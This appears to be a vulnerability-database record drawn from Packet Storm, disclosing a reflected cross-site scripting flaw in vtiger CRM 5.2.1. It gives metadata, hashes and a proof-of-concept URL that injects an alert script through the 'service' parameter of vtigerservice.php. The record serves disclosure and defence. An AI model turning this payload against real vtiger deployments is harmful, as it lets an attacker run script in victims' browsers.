ID

VAR-E-201104-1028


TITLE

vtiger CRM 5.2.1 Cross Site Scripting

Trust: 0.5

sources: PACKETSTORM: 100183

DESCRIPTION

A reflected cross site scripting vulnerability in vtiger CRM version 5.2.1 can be exploited to execute arbitrary JavaScript.

Trust: 0.5

sources: PACKETSTORM: 100183

AFFECTED PRODUCTS

vendor:vtigermodel:crmscope:eqversion:5.2.1

Trust: 0.5

sources: PACKETSTORM: 100183

EXPLOIT

------------------------------------------------------------------------
Software................vtiger CRM 5.2.1
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Critical (4/5)
Download................http://www.vtiger.com/
Discovery Date..........4/5/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------

--Description--

A reflected cross-site scripting vulnerability in vtiger CRM 5.2.1 can
be exploited to execute arbitrary JavaScript.

--PoC--

http://localhost/vtigercrm/vtigerservice.php?service=%3Cscript%3Ealert%280%29%3C/script%3E

Trust: 0.5

sources: PACKETSTORM: 100183

EXPLOIT HASH

LOCAL

SOURCE

md5: 925887753fa20f8477b9b236a16e3cca
sha-1: 6b561b33a01e97da694eab6b174dced5a1ab1316
sha-256: 16503d8f7b3e70437cff319ce1fb193af7665166d746ed4b65f60860441ec7ba
md5: 925887753fa20f8477b9b236a16e3cca

Trust: 0.5

sources: PACKETSTORM: 100183

EXPLOIT LANGUAGE

javascript

Trust: 0.5

sources: PACKETSTORM: 100183

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 100183

TYPE

arbitrary, xss

Trust: 0.5

sources: PACKETSTORM: 100183

TAGS

tag:exploit

Trust: 0.5

tag:arbitrary

Trust: 0.5

tag:javascript

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 100183

CREDITS

AutoSec Tools

Trust: 0.5

sources: PACKETSTORM: 100183

EXTERNAL IDS

db:PACKETSTORMid:100183

Trust: 0.5

sources: PACKETSTORM: 100183

SOURCES

db:PACKETSTORMid:100183

LAST UPDATE DATE

2022-07-27T10:01:21.477000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:100183date:2011-04-07T21:58:02